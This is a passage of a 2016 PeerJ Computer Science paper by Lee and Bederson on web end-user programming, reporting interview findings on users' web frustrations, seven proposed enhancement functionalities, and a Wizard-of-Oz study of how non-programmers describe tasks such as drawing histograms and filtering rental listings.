of the tasks is unsupported by the websites. For example, four participants wanted to automate simple interactions such as downloading multiple files or clicking a range of checkboxes with a single click. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 9/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 ‘‘[At an academic library], I click the ‘‘Save to Binder’’ button, then select a binder from the drop-down in a new window. Then I click the ‘‘save’’ button then the ‘‘done’’ button, then close the window. It’s really annoying to do it over and over. It would be great to create a ‘‘save this!’’ button.’’ (P4) Three participants wanted to automate filling the forms of personal / credit card information. Information from multiple sources. Reported by 20 participants, integrating information from multiple sources is a common practice on the Web (Zang & Rosson, 2009b). End-users switch between browser tabs to compare information repeatedly, but it can be time consuming since it requires short-term memory to compare information on tabs that are not simultaneously visible. A total of 17 participants wanted to save their time and effort by integrating information across multiple sources. For example, P33 told, ‘‘I often search for videos on YouTube for baby diapers or other things to wear because those videos are very helpful to understand usage of products.’’ Similarly, four participants wanted to integrate course schedule page with extra information available such as student reviews, lecture slides, and reading lists. Time-sensitive information. Five participants reported that they regularly check time- sensitive information such as price (3), hot deals (1), second-hand products (1), and other notifications (1). Using price trends as an example, three participants envisioned a complex service that automatically archives price information retrieved from multiple sites, visualizes the price data as timeline graph, and sends email/mobile notifications when the price drops: ‘‘I can imagine that program or Web site will be able to grab information, especially prices from various malls, and compare it automatically. It will also say ‘this is the lowest price for recent three months.’ so that I don’t have to visit Amazon and Newegg everyday. [...] I want it to send me email alerts—saying ‘Hey, based on your recent search history on the Canon G15, we found these new deals and prices. It’s the lowest price in the last month.’ (P21) ‘‘[She opened http://CamelCamelCamel.com] If I want to buy a bread machine, I search and choose one model. Here the graph shows the price trend of the model. I can make a decision on whether I should buy or wait. Unfortunately, this site only shows products from Amazon.com.’’ (P33) Privacy Privacy did not come up much, but one participant (P24) expressed strong negative opinions about the way that a social networking service handles her data: ‘‘[At a social network service] a friend of mine told me that if I ’like’ her photos or put comment on them, others will be able to see it even if the photos are private. [...] Here’s another example that I don’t like about [the SNS]. One day I uploaded a family photo, and my family-in-law shared those photos. That’s totally fine. However, the problem began when friends of my family-in-law started liking and commenting on my family photos. I Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 10/26 https://peerj.com http://CamelCamelCamel.com http://Amazon.com http://dx.doi.org/10.7717/peerj-cs.91 Table 2 Potential functionality of Web enhancements for addressing categories of challenges and enhancements identified from the interview study. ( ⊙ : the functionality is required or related to at least half of challenges and enhancements in the category,©: required by less than half,×: No enhancement or challenge in the category required the functionality). Modify Compute Interactivity Gather Automate Store Notify Untruthful information Deceptive ads ⊙ ⊙ © © × × × Links to low-quality content ⊙ ⊙ ⊙ © ⊙ ⊙ × Virus and Malware ⊙ ⊙ ⊙ ⊙ ⊙ ⊙ × Opinion spam ⊙ © © ⊙ × ⊙ × Cognitive distraction Abrupt design changes ⊙ × ⊙ × ⊙ ⊙ × Annoying advertisements ⊙ ⊙ ⊙ × ⊙ © × Unintuitive tasks ⊙ © ⊙ ⊙ ⊙ × × Information overload ⊙ ⊙ ⊙ × © ⊙ × Repetitive operations Unsupported Tasks ⊙ × ⊙ © ⊙ ⊙ × Information from multiple sources ⊙ ⊙ ⊙ ⊙ © © © Time-sensitive information ⊙ © ⊙ ⊙ ⊙ ⊙ ⊙ Privacy © × × × © © © received a lot of notifications of those activities by people I do not know at all. I felt a little scared.’’ (P24) As another example of privacy issues, P24 believed that her browser tracks her activity history, and shared it with online advertisement companies without her permission, because banner ads on other Web pages show ads related to her previous activity. Potential functionality of web enhancements This section presents functionalities that we believe future WebEUP systems should consider providing to address the challenges reported in the previous section. We identified seven functionalities: Modify, Compute, Interactivity, Gather, Automate, Store and Notify. Table 2 illustrates how closely each functionality is related with the challenges. Among them, Interactivity, Store, and Notify are not generally supported by existing WebEUP systems. Modify. Modification of existing web pages is the most commonly required functionality for 66 out of 109 enhancements. Examples include attaching new DOM elements to the original pages (31 enhancements), removing or temporarily hiding unnecessary elements (15 enhancements), and highlighting information of interest by changing font size, color, or position (five enhancements). Modification often involves adding new interactive behavior of Web sites (eight enhancements). Existing WebEUP tools support a wide range of modification such as removing unwanted DOM elements (Bolin et al., 2005), and attaching new DOM elements or interactive behavior to existing elements (Toomim et al., 2009). Compute. A total of 29 enhancements require a variety of computing data. For examples, 13 enhancement ideas against untruthful information and distracting content on the Web involve filtering elements by certain criteria. Nine ideas of integrating Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 11/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 information from multiple sources require ‘compute’ functionality to extracting specific information from available documents. Seven enhancement ideas require arithmetic operations. While computation is a fundamental part of programming languages, existing EUP systems support it in varying degrees. For example, scripting languages (https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/) offer an extensive set of language constructs such as general-purpose languages (e.g., JavaScript). Data integration systems (Tuchinda, Szekely & Knoblock, 2007; Wong & Hong, 2007) focus on handling large amount of semi-structured text input, but provide less support on numerical operations. Systems for automated browsing (Miller et al., 2008; Leshed et al., 2008) provide few language constructs for computation. Interactivity. A total of 29 enhancements across all categories (except the privacy issue) require interactive components to accommodate the dynamic and uncertain nature of the Web and end-user needs. For example, 13 enhancements include triggering buttons, because users wanted to make use of them in-situ. Eight enhancements show previews of changes it will make on the original sites so that users can choose among them. Enhancements often require users to configure options such as search keywords, filtering criteria, specific DOM elements based on their information needs (eight enhancements). WebEUP tools often employ predefined interactive components such as buttons and preview widgets (Toomim et al., 2009). However, none of them enable users to create their own interactivity. Gather. A total of 18 enhancements involve gathering information from either the current domain (9 enhancements) or external sources (five enhancements). For example, to deal with various kinds of untruthful information, enhancements should be able to gather information from trustworthy sources. Gathering is an essential part of integrating information from multiple sources, as P5 stated, ‘‘At various cosmetic malls, I wish the main listing page showed detailed direction on how to use the products.’’ In contrast, participants wanted to gather information from external sources that current sites are missing. Infor- mation gathering is supported by mashup tools (Wong & Hong, 2007; Ennals et al., 2007; Tuchinda, Szekely & Knoblock, 2008). Automate. A total of 15 enhancements automate repetitive tasks that include filling in input forms (four enhancements), downloading multiple images and files (four), page navigation (three), clicking a series of buttons, checkboxes, and links (three), and keyword search (one). Existing WebEUP tools such as CoScripter (Leshed et al., 2008) and Inky (Miller et al., 2008) support automating repetitive tasks. Store. A total of 14 enhancements store three types of data while being used. The first type relates to user’s activities such as filling input forms, page navigation, and job applications found in five enhancements. The second type is temporal information periodically gathered from designated sources such as online shopping malls, or ticketing sites found in five enhancements. The last is bookmarks of online resources such as news articles, blog posts, or streaming videos found in four enhancements. Existing WebEUP systems such as CoScripter (Bogart et al., 2008) often provide public repositories for scripts, but none of them allow end-users to create custom storage of usage data. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 12/26 https://peerj.com https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ http://dx.doi.org/10.7717/peerj-cs.91 Notify. Eight enhancements for integrating information from multiple sources (‘Information from multiple sources’) and gathering time-sensitive information (‘Time- sensitive information’) involve sending notifications to users via emails (seven) or SMS messages (one), periodically or when user-specified events occur. To our knowledge, no existing WebEUP tool supports notification. Discussion In this section, we discuss two design implications for future WebEUP systems and designing Web sites in general. Social platform beyond technical support Traditional WebEUP systems focus on lowering the technical barrier of Web programming. For example, mashup tools enable users to integrate information from multiple pages with just a few clicks. Automation tools allow users to create macro scripts through demonstration. Despite the advantage of those technical aids, we noted a few enhancement ideas require domain knowledge of multiple users who have the same information needs. For instance, when end-users want to integrate additional information with original pages, the key question is where the additional information can be found. When users want to focus on an important part of a long text, the key is which part of the text previous visitors found useful (similar to Amazon Kindle’s ‘‘Popular Highlights’’ feature.) An example of how a social platform could address the untruthful information issue follows. An end-user programmer creates and deploys an enhancement that attaches an interactive component (e.g., button for rating individual hyperlinks) to the original page. Users who have installed the enhancement would use the new component to provide their knowledge (e.g., quality of the linked resources), which will be saved in the enhancement’s database. As more data is collected, the enhancement will become more powerful. To enable end-users to build social platforms in the aforementioned scenario, future WebEUP systems need two functionalities. First, end-user programmers should be able to create and attach interactive components that collect knowledge and feedback from users. Second, end-user programmers should be able to set up centralized servers that communicate with individual enhancements running in each user’s browser, and store collected information. To our knowledge, no prior WebEUP system has fully supported these functionalities for social platforms. However, there are certainly custom solutions of this type that are commonly used such as, for example, Turkopticon https://turkopticon.ucsd.edu/ that helps web workers using Amazon Mechanical Turk rate job creators. Alleviate the risk of using enhancements According to the attention investment framework (Blackwell & Burnett, 2002), end-users would decide whether to use an enhancement or not as a function of perceived benefit versus cost. Even though our participants assumed no development costs, we could identify the following concerns about risks of using enhancements. Uncertain needs. As mentioned earlier, the dynamic and uncertain nature of the Web and end-user needs requires interactive behavior of enhancements. For example, P27 Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 13/26 https://peerj.com https://turkopticon.ucsd.edu/ http://dx.doi.org/10.7717/peerj-cs.91 found advertisements on an online shopping site to be annoying, but did not remove the advertisements because of their potential usefulness in the future. WebEUP systems should be able to support interactivity so that users can change configurations or make decisions whenever their needs change. Otherwise end-users will be forced to stop using it, as P26 and P17 did with non-interactive pop-up blockers. Breaking the original design. Enhancement developers should try to minimize unnecessary change of the original site. Two participants expressed concerns about breaking the original site’s design and functionality: ‘‘I think the best part of Craigslist is its simplicity. I might have seen the filters, but did not bother setting them every time I visit this site.’’ (P20) Privacy and security. End-users have significant privacy and security concerns about installing extra software, especially those developed by third-party programmers. Ironically, we observed end-users rarely read legal documents, and are trained to give permissions to popular apps. Future work should confront these practical concerns and design how to communicate potential risks and treatments. Implications for web site designers The seven categories of enhancements can be useful to web site designers as they think about what a wide range of users might want. There is another potential of more directly benefiting from end-user modifications to web sites. Actual enhancements made by end-users could provide valuable feedback for designers of the sites if those desires were expressed via use of a WebEUP tool. For example, designers could learn what kind of information users consider to be untruthful by learning about user feedback on specific information. Repetitive operations could be observed by seeing what modifications users make, etc. Nevertheless those feedbacks cannot replace WebEUP, as designers and users often have conflicting interests. For instance, designers may not agree to remove advertisements that end-users find annoying since they provide revenue. Some ideas may be useful for specific user groups but not for everyone, and so are not worth pursuing. Ideally, designers should consider providing hooks or APIs that enable end-users to build robust, high-quality enhancements. Summary The interview study explored the space of challenges that end-users regularly experience on the Web, and the functionalities of enhancements that they envisioned. The seven categories of enhancements can provide guidance to website designers in the first place to be aware of the unique needs of many users. Also, WebEUP tools should allow end-user programmers to customize interactivity and design of enhancements they create. The interview study has a few limitations. First, 35 participants is surely not large and diverse enough to fully represent the needs that all end-users might have. However, we believe that even this modest number has surfaced a significant number of important areas that need support. Second, most participants shared their experience relating to non-professional tasks such as academic searches, shopping, and watching videos, but had little to discuss about professional activities. Thus, the findings should be complemented by future research that focuses on professional activities. Our exploratory study focused Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 14/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 1The study is exempt from IRB review. Table 3 Occupational background of the participants of study 2. Graduate students 6 Engineering 3 Business 2 Education 1 Professionals 3 IT specialists 2 Directors and office managers 1 Non-professionals (e.g., homemaker) 3 Total 13 on end-user needs without considering development costs. Although our decision allowed end-users to express ideas more freely, future work needs to ask participants to both estimated cost and benefits in relation. STUDY 2: NON-PROGRAMMERS MENTAL MODEL OF COMPUTATIONAL TASKS Programming is difficult to learn since its fundamental structure (e.g., looping, if-then conditional, and variable referencing) is not familiar or natural for non-programmers (Pane, Myers & Ratanamahatana, 2001). Understanding non-programmer’s mindset is an important step to develop an easy-to-learn programming environment. The second study builds on the enhancement ideas from the first study by examining how non-programmers naturally describe common computational tasks. Since the study is designed to be open- ended and formative, participants were not provided with a specific tool or language constructs, but expressed intent via verbal statements, examples, and gestures. They also refined their expression through conversational dialogues with the interviewer using the Wizard-of-Oz technique. As result, the findings provide broad and general implications of how non-programmers express computational intent, and suggest open-ended research questions for future EUP systems. Participants The study was conducted with 13 participants, including five males and eight females, average 33.3 years old (STD = 5.86) with varying occupations as summarized in Table 3. All of the participants were experienced computer users, but they all said that they had not programmed before. The participants were recruited by the university mailing list that we used in the first study. They received no compensation for participation in this study. Method The study aims to characterize how non-programmers naturally describe complex tasks without being biased by specific language constructs or interactive components.1 We employed the Wizard-of-Oz technique (Zimmerman et al., 2009) where the interviewer acted as a hypothetical computer agent that could understand the non-programmer’s verbal statements, behavioral signals (e.g., page navigation, mouse click), gestures, and Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 15/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 drawing on scratch paper, and help them through conversational dialogue. The computer agent (called ‘‘computer’’ from here on) followed the rules listed below. (1) The computer can understand all the literal meaning of participants’ instruction, gestures, and drawings. However, the computer cannot automatically infer any semantic meaning of the task or the material. For example, a rental posting ‘‘4 Bedrooms 3 Lvl Townhome $1,650/4br’’ is just a line of text to the computer. (2) The computer can perceive a pattern from participant’s repeated examples and demonstration. For example, if a participant counted numbers within a range 1–3 in a table, the computer asks the participants ‘‘Are you counting numbers that are within a specific range?’’ (3) The computer can execute the participant’s instruction only if it is clearly specified without ambiguity. Otherwise the computer asks for additional information to resolve it through conversational dialogue like below: Programmer: Delete houses with fewer than three bedrooms. Computer: Please tell me more about ‘houses with fewer than three bedrooms’. Which part of the page is relevant? When the programmer demonstrates a set of examples, the computer will suggest a generalizing statement like below: Programmer: Delete this one because it contains 3br. Computer: Do you want me to delete every line that has 3br? A sheet of paper containing basic instruction was provided, and the participants could draw or write anything on the paper as shown in Figs. 1 and 2. We chose three tasks that end-user programmers commonly do. Task 1. Drawing histogram. Given a sheet of paper containing a blank histogram and 10 random numbers between 0 and 12 (see Fig. 1), the participants were asked to explain the computer how to draw a histogram of the numbers. The blank histogram has four bins (0∼ 3, 3∼6, 6∼9, and 9∼12). The purpose of this task was to observe how non-programmers perform: (1) common data-processing operations (e.g., iteration, filtering, and counting), and (2) visualize numeric data by examples and demonstration. Task 2. Custom filter. We prepared 10 rental postings in Table 4 copied from an online marketplace http://Craigslist.com. The participants were asked to create a program that removes houses having fewer than three bedrooms. The program consists of three components: (1) extracting text that represents the number of bedrooms in each post (e.g., ‘‘3br(s),’’ ‘‘3bedroom(s),’’ ‘‘3 BEDROOMS,’’ ‘‘3/2’’), (2) a conditional logic for filtering posts with less than three bedrooms, and (3) removing/hiding the filtered houses. The purpose of the task is to observe how non-programmers decompose a big task into sub-tasks, specify extraction queries, and refer temporary variables such as sub-strings and selected postings. Task 3. Mash up. At Amazon.com, each product has different options (e.g., available colors and sizes) that are shown in the product detail page. The participants are asked to create a program that extracts the available colors from detail pages, and attaches to the product listing. The purpose of the task is to understand how non-programmers would describe copy operations across multiple pages, and event handling. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 16/26 https://peerj.com http://Craigslist.com http://Amazon.com http://dx.doi.org/10.7717/peerj-cs.91 Figure 1 An example drawing of Task 1. Participants were asked to explain how to draw a histogram of the numbers in the table. In this example, the participant gave histogram bins different codes (A–D), and marked each number with the codes. Since the participant could not put 12 into any bin, he marked the number with question mark and a line that points a missing bin. Table 4 Task 2 material. In Task 2, the participants were asked to create a filter than removes houses with less than three bedrooms among housing rental posts scraped from http://Craigslist.com. ‘‘You want to create a filter that removes houses having less than 3 bed- rooms. How would you explain it to the computer?’’ •Brand New Townhome! $2,200/3br—1948ft2—(Clarksburg) •Lanham 2/1 new deck $1,050/1818ft2—(Lanham) •4 Bedrooms 3 Lvl Townhome $1,650/4br—(MD) •823 Comer Square Bel Air, MD 21014 $ 1,675/studio ...(6 more)... Procedure Each session began with a brief interview about the participant’s programming experience and occupational background. The interviewer introduced the Wizard-of-Oz method, and gave an exercise task—ordering the interviewer (acting the hypothetical computer agent) to move a cup to another corner of the table. After participants said they fully understood the concept of the hypothetical computer agent, we started the actual study by introducing the three scenarios in a randomized order. For each scenario, participants were asked to explain the task to the ‘‘computer.’’ Participants were allowed to finish or to give up a task at any point. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 17/26 https://peerj.com http://Craigslist.com http://dx.doi.org/10.7717/peerj-cs.91 Figure 2 An example drawing of Task 2. In this example of Task 2, the participant used scribbles along with verbal statements. For example, the participant wrote variations of keywords that indicate ‘‘bedroom’’ used in the list. He/she also circled and underlined the number of rooms in each title to demonstrate the text extraction logic, crossed out titles that did not meet the criteria, and drew arrows from houses to empty slots in the list. Data and analysis The entire session was video recorded, and transcribed for qualitative analysis. The transcript of each task consists of a sequence of conversational dialogue between the participant and the interviewer, finger and mouse pointing gestures, scribbles on the paper (Figs. 2 and 3; only for Task1 and T2), and page scroll and mouse events in the browser (only for Task 3). To analyze the transcript, the first author created the initial codebook derived from the literature (Pane, Myers & Ratanamahatana, 2001) and an initial post-interview discussion within the research team. The codebook included how the participants described and what challenges they experienced. While repeating the coding process, a few categories emerged: programming styles, imperative commands, ambiguities, and multi-modal intent. Findings In this section we characterize how non-programmers describe computational tasks. Participants were allowed to stop at any moment, but all of them could eventually complete tasks with the computer’s help. Each task took an average of 415.3 s (SD=217.4). We did Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 18/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 Figure 3 Task 3 material. In Task 3, participants were asked to describe a simple Mashup program that shows available colors of each individual product in the Main page extracted from the Product Detail page. not observe any fatigue effect. Since participants had very limited understanding of the computer at the beginning, most of their initial explanations were not very informative. Thus the computer asked for further information as the examples below. (Task 1. Histogram) P12: Wouldn’t computers draw graph when numbers are assigned? I’m asking because I have no idea. P11: Find the numbers, and draw them at the first bin. Computer: How can I draw them? P11: What should I tell? Color? (Task 2. Custom filter) P5: First, I scan the list with my eyes and exclude them. They clearly stand out Computer: How do they stand out? P8: I’d order, ‘‘Exclude houses with one or two bedrooms. ‘‘Computer: How can I know the number of bedrooms? (Task 3. Mash Up) P11: I’d ask computer to show available colors of this Columbia shirt. Computer: Where can I get available colors? Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 19/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 Natural language tends to be underspecified and ambiguous (Pane, Myers & Ratanamahatana, 2001). We frequently observed that our participants skipped mentioning essential information. For example, most participants did not specify how to iterate multiple elements in list. They instead demonstrated handling the first item, and expected the computer to automatically repeat the same process for the rest of the items. They did not refer to objects by names as programmers use variables. However, they referred to previously mentioned objects by their actual values (underlined in the following example), as P20 said, ‘‘In this next column, we need items going 6, 7, and 8. So please find those 6, 7, 8, and draw bar in this column.’’ They also used pronouns (e.g., ‘‘Remove them’ ), data type (e.g., ‘‘Attach colors" ), and gestures (e.g., ‘‘Paste them here.’’ ). While loops and variable referencing are core concepts of programming languages, our findings suggest that non-programmers would find them unnecessary or even unnatural. We will discuss the issue further with design implications for future EUP systems in the discussion section. Through conversational dialogues, participants figured out what information the computer requires and how to explain. We found a few characteristics of how non- programmers explain computational tasks as listed below. Explaining with rules and examples was used by 9 of 13 participants. When participants explained rules first, the following examples usually provided information that the rules were potentially missing. For example, while drawing a histogram for Task 1, P4 stated a rule, ‘‘Determine which bin each number is in,’’ followed by an example, ‘‘If the number is one (pointing the first item in the table), then count up this bin (pointing the first bin in the histogram).’’ Participants also provided examples first, and then explained the rules. P10 doing Task 1 gave all the numbers (0, 1, and 2) for the first bin, ‘‘For here (pointing the first column) we need 0, 1, and 2’’, and then explained the range of those numbers, ‘‘Find numbers including zero, smaller than two.’’ Traditional programming languages rarely allow example-based programming. Although EUP systems often support Programming-by- Example (PBE) techniques, they do not allow this pattern—combining rules and examples to describe individual functional elements. Elaborating general statement through iteration was observed for every participant. Initial explanations of tasks were usually top-level actions (e.g., draw bars, remove houses, attach pictures) that contained a variety of ambiguities; but participants then iteratively elaborated the statements by adding more details. For example, P1 doing T3 described the top-level action, ‘‘Attach pictures here.’’ Then he elaborated where the pictures were taken from, ‘‘Attach pictures from the pages.’’ He kept on elaborating what the pages are and how to extract pictures from the pages. For T 1, as another example, P14 told the computer, ‘‘Draw a graph.’’ She then rephrased the statement with more details, ‘‘Draw a graph to number 2.’’ This pattern is far from traditional programming languages that support users to create statements in the order of their execution. Multi-modal expressions including gestures and scribbles were frequently used by all participants. While verbal statements were still the central part of explanation, they used gestures along with pronouns (e.g., ‘‘Count these’’ , ‘‘Put them here ’’), and Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 20/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 scribbles to supplement verbal statements like an example in Fig. 2. While multi- modal expressions seem to be natural and effective for non-programmers, traditional programming environments rarely support them. Rationales are not direct instructions for the computer. However, we consistently observed participants explaining rationales. For example, P6 doing T3 explained why she chose to attach small color chips rather than larger images, ‘‘While we can show images, which would be quite complex, I’d want you to do use color boxes.’’ P13 also explained rationale of her scribbles on the sheet of T1, ‘‘We can also secretly write number here (center of each cell) to remember, so track for afterward so we didn’t make any mistake.’’ Discussion This user study provides characteristics of non-programmers explaining how they would solve computational tasks. Given that traditional programming environments do not fully support the way these participants conceptualized their solutions, we discuss the implicationsforthe designofmulti-modalandmixed-initiativeapproaches formakingend- user programming more natural and easy-to-use for these users. Our recommendations are to: Allow end-users to express ideas with combinations of rules, examples, gesture, and rationales. A common pattern of multi-modal intent expression is to generate rules (i.e., program modules) from examples or demonstrations, and to allow users to review and modify those rules (Kandel et al., 2011; Le, Gulwani & Su, 2013; Yessenov et al., 2013). In such systems, different modalities have separated roles. Our user study, in contrast, suggests that rules, example, and rationales can be highly effective when used in combination. Future EUP systems should give end-users more flexibility to express their intent via multi-modality. Support iterative refinement of programs. It is well known that end-users may not be able to provide complete information of the programs they want (Lau, 2008). We observed that users would start with quick and brief description of task outlines, goals, or solutions that handle only a subset of the potential scenarios, and then iteratively refine it by adding more rules and examples. Many PBE systems (Gulwani, 2011) allow users to provide additional examples for disambiguation, and even suggest critical examples (Mayer et al., 2015). Support mixed-initiative interaction to disambiguate user intent. To guide non- programmers to explain essential information such as loops and variable referencing, our study employed conversational dialogue (as explained in ‘Method’) between participants and the computer. For example, when participants gave incomplete statements (e.g., demonstration for the first item), the computer asked them for additional information (‘‘What would you like to do for the rest items?’’) or confirmation (e.g., ‘‘Do you want to do the same for the rest items?’’). Likewise, future EUP tools should incorporate mixed-initiative interaction to help end-users express unambiguous statements; although it is an open-ended research question how the computer and end-users have mutual understanding. We made several simplifying assumptions that limit the scope of our findings. First, the computer followed three informal rules, which may not be specific enough to design Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 21/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 working a system. First, the computer did not follow a formal definition for its behavior and abilities. A formal set of rules would make the Wizard-of-Oz study stronger. Second, participants could not see or test programs they were building, which is uncommon for any programming environment. The next step is to study similar questions with a fully interactive system that provides generated programs and test results. Third, the three tasks do not represent a full spectrum of computational tasks. However, as with the first study, we believe that even this narrow analysis provides useful insights that could guide the design of a new WebEUP system. Finally, future work should include a functioning system that presents and tests solutions that address the challenges and the implications of this study. CONCLUSION This paper reports results from two user studies that help to better understand the needs and capabilities of Web end-users. The first study, a semi-structured interview study, explores challenges that end-users daily experience, and identifies seven categories of enhancements that we believe would be helpful to be included in future EUP tools. The second, a Wizard- of-Oz study, demonstrates how non-programmers explain common computational tasks and provides design ideas for more natural programming environments. Finally future work should build an interactive research prototype based on the findings, and test with real end-users. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Benjamin Bederson is an Academic Editor for PeerJ. Author Contributions • Tak Yeon Lee conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Benjamin B. Bederson reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): IRBNet @ University of Maryland College Park (UMCP), Project ID and Title: [443008- 1] Survey About Web Inefficiencies. Project was declared exempt from IRB review. Data Availability The following information was supplied regarding data availability: The raw data has been supplied Supplemental Information 1. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 22/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91/supp-1 http://dx.doi.org/10.7717/peerj-cs.91 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.91#supplemental-information. REFERENCES Biermann AW, Ballard BW, Sigmon AH. 1983. An experimental study of natural language programming. International Journal of Man-Machine Studies 18:71–87 DOI 10.1016/S0020-7373(83)80005-4. Blackwell A, Burnett M. 2002. Applying attention investment to end-user programming. In: Proceedings of the IEEE 2002 symposia on human centric computing languages and environments, 2002. Piscataway: IEEE, 28–30 DOI 10.1109/HCC.2002.1046337. Bogart C, Burnett M, Cypher A, Scaffidi C. 2008. End-user programming in the wild: a field study of Co Scripter scripts. In: IEEE symposium on visual languages and human-centric computing, 2008, VL/HCC 2008. Piscataway: IEEE, 39–46 DOI 10.1109/VLHCC.2008.4639056. Bolin M, Webber M, Rha P, Wilson T, Miller RC. 2005. Automation and cus- tomization of rendered web pages. In: UIST’05. New York: ACM, 163–172 DOI 10.1145/1095034.1095062. Braun V, Clarke V. 2006. Using thematic analysis in psychology. Qualitative Research in Psychology 3:77–101 DOI 10.1191/1478088706qp063oa. Cameron JM, Churchill EF. 2009. Conversations in developer communities: a pre- liminary analysis of the Yahoo! Pipes community. In: Proceedings of the fourth international conference on communities and technologies. New York: ACM, 195–204. Cao J, Rector K, Park TH, Fleming SD, Burnett M, Wiedenbeck S. 2010b. A debugging perspective on end-user mashup programming. In: 2010 IEEE symposium on visual languages and human-centric computing (VL/HCC). Piscataway: IEEE, 149–156 DOI 10.1109/VLHCC.2010.29. Cao J, Riche Y, Wiedenbeck S, Burnett M, Grigoreanu V. 2010a. End-user mashup programming: through the design lens. In: CHI ’10. New York: ACM, 1009–1018 DOI 10.1145/1753326.1753477. Cheema S, Gulwani S, LaViola J. 2012. QuickDraw: improving drawing expe- rience for geometric diagrams. In: CHI ’12. New York: ACM, 1037–1064 DOI 10.1145/2207676.2208550. Chia PH, Yamamoto Y, Asokan N. 2012. Is this app safe? A large scale study on application permissions and risk signals. In: Proceedings of the 21st interna- tional conference on world wide web. WWW ’12. New York: ACM, 311–320 DOI 10.1145/2187836.2187879. Corritore CL, Kracher B, Wiedenbeck S. 2003. On-line trust: concepts, evolving themes, a model. International Journal of Human-Computer Studies 58:737–758 DOI 10.1016/S1071-5819(03)00041-7. Cypher A, Dontcheva M, Lau T, Nichols J. 2010. No code required: giving users tools to transform the web. San Francisco: Morgan Kaufmann Publishers Inc. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 23/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91#supplemental-information http://dx.doi.org/10.7717/peerj-cs.91#supplemental-information http://dx.doi.org/10.1016/S0020-7373(83)80005-4 http://dx.doi.org/10.1109/HCC.2002.1046337 http://dx.doi.org/10.1109/VLHCC.2008.4639056 http://dx.doi.org/10.1145/1095034.1095062 http://dx.doi.org/10.1191/1478088706qp063oa http://dx.doi.org/10.1109/VLHCC.2010.29 http://dx.doi.org/10.1145/1753326.1753477 http://dx.doi.org/10.1145/2207676.2208550 http://dx.doi.org/10.1145/2187836.2187879 http://dx.doi.org/10.1016/S1071-5819(03)00041-7 http://dx.doi.org/10.7717/peerj-cs.91 Cypher A, Halbert DC, Kurlander D, Lieberman H, Maulsby D, Myers BA, Turransky A (eds.) 1993. Watch what I do: programming by demonstration. Cambridge: MIT Press. Ennals R, Brewer E, Garofalakis M, Shadle M, Gandhi P. 2007. Intel Mash Maker: join the web. SIGMOD Record 36:27–33 DOI 10.1145/1361348.1361355. Fischer G, Giaccardi E. 2006. Meta-design: a framework for the future of end-user development. In: Lieberman H, Paternó F, Wulf V, eds. End user development. Netherlands: Springer, 427–457. Goldstein DG, McAfee RP, Suri S. 2013. The cost of annoying ads. In: Proceedings of the 22nd international conference on world wide web. WWW ’13. Republic and Canton of Geneva: International World Wide Web Conferences Steering Committee, 459–470. Gulwani S. 2010. Dimensions in program synthesis. In: PPDP’10. New York: ACM, 13–24 DOI 10.1145/1836089.1836091. Gulwani S. 2011. Automating string processing in spreadsheets using input–output examples. SIGPLAN Notices 46:317–330 DOI 10.1145/1925844.1926423. Hruschka DJ, Schwartz D, St John DC, Picone-Decaro E, Jenkins RA, Carey JW. 2004. Reliability in coding open-ended data: lessons learned from HIV behavioral research. Field Methods 16:307–331 DOI 10.1177/1525822X04266540. Kandel S, Paepcke A, Hellerstein J, Heer J. 2011. Wrangler: interactive visual specifi- cation of data transformation scripts. In: CHI ’11. New York: ACM, 3363–3372 DOI 10.1145/1978942.1979444. Ko AJ, Abraham R, Beckwith L, Blackwell A, Burnett M, Erwig M, Scaffidi C, Lawrance J, Lieberman H, Myers B, Rosson MB, Rothermel G, Shaw M, Wiedenbeck S. 2011. The state of the art in end-user software engineering. ACM Computing Surveys 43:21–1–21:44 DOI 10.1145/1922649.1922658. Kuttal SK, Sarma A, Rothermel G. 2011. History repeats itself more easily when you log it: Versioning for mashups. In: 2011 IEEE symposium on visual lan- guages and human-centric computing (VL/HCC). Piscataway: IEEE, 69–72 DOI 10.1109/VLHCC.2011.6070381. Kuttal SK, Sarma A, Rothermel G. 2014. On the benefits of providing versioning support for end users: an empirical study. ACM Transactions on Computer-Human Interaction 21:9:1–9:43 DOI 10.1145/2560016. Lau T. 2008. Why PBD systems fail: lessons learned for usable AI. In: CHI 2008, April 5– April 10, 2008, Florence, Italy. New York: ACM,. Le V, Gulwani S, Su Z. 2013. SmartSynth: synthesizing smartphone automation scripts from natural language. In: MobiSys ’13. 